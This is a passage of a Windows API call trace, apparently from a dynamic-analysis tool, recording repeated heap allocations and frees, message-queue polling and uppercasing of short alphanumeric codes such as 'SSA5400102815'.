lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0209.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0209.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0209.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0209.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.190] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0209.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.191] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0209.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.192] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0209.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0209.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0209.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0209.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.195] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.195] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.195] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.196] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.196] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.196] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.196] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.196] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.197] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.197] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.197] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.198] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.198] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.198] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.198] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.198] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0209.198] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.199] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.199] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 